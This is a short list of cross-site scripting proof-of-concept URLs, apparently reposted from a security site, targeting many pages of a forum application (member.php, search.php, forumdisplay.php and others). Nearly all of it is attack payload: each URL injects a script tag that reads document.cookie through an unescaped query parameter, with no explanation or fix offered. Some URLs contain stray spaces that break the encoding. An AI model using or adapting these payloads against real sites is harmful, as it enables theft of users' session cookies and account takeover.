[site]/[path]/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F script&match=all&titlesonly=1 [site]/[path]/index.php?s=<script>alert('document.cookie')</script> [site]/[path]/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript &match=all&titlesonly=0 [site]/[path]/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2 Fscript&match=all&titlesonly=0 [site]/[path]/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F script&match=all&titlesonly=0 [site]/[path]/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript &match=all&titlesonly=0 [site]/[path]/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3 Ealert%28document.cookie %29%3B%3C%2Fscript&match=all&titlesonly=0 [site]/[path]/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript &match=all&titlesonly=0 [site]/[path]/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3E alert%28document.cookie %29%3B%3C%2Fscript&match=all&titlesonly=0 [site]/[path]/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie %29%3B%3C%2Fscript&match=all&titlesonly=0 [site]/[path]/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript& match=all&titlesonly=0 [site]/[path]/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript& match=all&titlesonly=0 [site]/[path]/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F script&match=all&titlesonly=0 [site]/[path]/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F script&match=all&titlesonly=0 Источник www.securitysib.com
